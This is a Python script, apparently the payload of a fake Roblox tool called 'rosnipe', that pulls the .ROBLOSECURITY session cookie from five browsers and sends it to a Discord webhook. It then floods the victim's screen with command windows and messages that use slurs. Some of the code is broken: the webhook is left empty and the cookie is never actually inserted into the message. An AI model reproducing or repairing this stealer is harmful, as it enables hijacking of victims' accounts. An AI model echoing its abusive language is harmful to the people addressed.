import browser_cookie3, requests
import os
from discord_webhook import DiscordWebhook, DiscordEmbed


webhook = ""

def config1():
    try:
        cookies = browser_cookie3.edge(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        embed = DiscordEmbed(title='FELINE GOT A HIT', description='some retard imported rosnipe', color='000000')
        embed.set_author(name='Author Name', url='https://discord.gg/comrades', icon_url='https://cdn.discordapp.com/avatars/192505979080802304/884577ef19797e280bd7cdb2a6ab8601.png?size=1024')
        embed.set_footer(text='.gg/comrades')
        embed.set_timestamp()
        embed.add_embed_field(name='Edge Cookie', value='{cookie}')
        webhook.add_embed(embed)
        response = webhook.execute()
    except:
      pass 

def config2():
    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        embed = DiscordEmbed(title='FELINE GOT A HIT', description='some retard imported rosnipe', color='000000')
        embed.set_author(name='Author Name', url='https://discord.gg/comrades', icon_url='https://cdn.discordapp.com/avatars/192505979080802304/884577ef19797e280bd7cdb2a6ab8601.png?size=1024')
        embed.set_footer(text='.gg/comrades')
        embed.set_timestamp()
        embed.add_embed_field(name='Chrome Cookie', value='{cookie}')
        webhook.add_embed(embed)
        response = webhook.execute()
    except:
      pass 

def config3():
    try:
        cookies = browser_cookie3.firefox(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        embed = DiscordEmbed(title='FELINE GOT A HIT', description='some retard imported rosnipe', color='000000')
        embed.set_author(name='Author Name', url='https://discord.gg/comrades', icon_url='https://cdn.discordapp.com/avatars/192505979080802304/884577ef19797e280bd7cdb2a6ab8601.png?size=1024')
        embed.set_footer(text='.gg/comrades')
        embed.set_timestamp()
        embed.add_embed_field(name='FireFox / Mozilla Cookie', value='{cookie}')
        webhook.add_embed(embed)
        response = webhook.execute()
    except:
      pass 

def config4():
    try:
        cookies = browser_cookie3.brave(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        embed = DiscordEmbed(title='FELINE GOT A HIT', description='some retard imported rosnipe', color='000000')
        embed.set_author(name='Author Name', url='https://discord.gg/comrades', icon_url='https://cdn.discordapp.com/avatars/192505979080802304/884577ef19797e280bd7cdb2a6ab8601.png?size=1024')
        embed.set_footer(text='.gg/comrades')
        embed.set_timestamp()
        embed.add_embed_field(name='Brave Cookie', value='{cookie}')
        webhook.add_embed(embed)
        response = webhook.execute()
    except:
      pass 

def config5():
    try:
        cookies = browser_cookie3.opera(domain_name='roblox.com')
        cookies = str(cookies)
        cookie = cookies.split('.ROBLOSECURITY=')[1].split(' for .roblox.com/>')[0].strip()
        embed = DiscordEmbed(title='FELINE GOT A HIT', description='some retard imported rosnipe', color='000000')
        embed.set_author(name='Author Name', url='https://discord.gg/comrades', icon_url='https://cdn.discordapp.com/avatars/192505979080802304/884577ef19797e280bd7cdb2a6ab8601.png?size=1024')
        embed.set_footer(text='.gg/comrades')
        embed.set_timestamp()
        embed.add_embed_field(name='Opera GX Cookie', value='{cookie}')
        webhook.add_embed(embed)
        response = webhook.execute()
    except:
      pass 


def LMFAO():
    os.system("START")
    os.system("title RETARD")

def Start():
    os.system("title GET BEAMED RETARDDDD")
    os.system("echo LMFAOOO GET BEAMED IDIOT | discord.gg/comrades")
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    LMFAO()
    
    
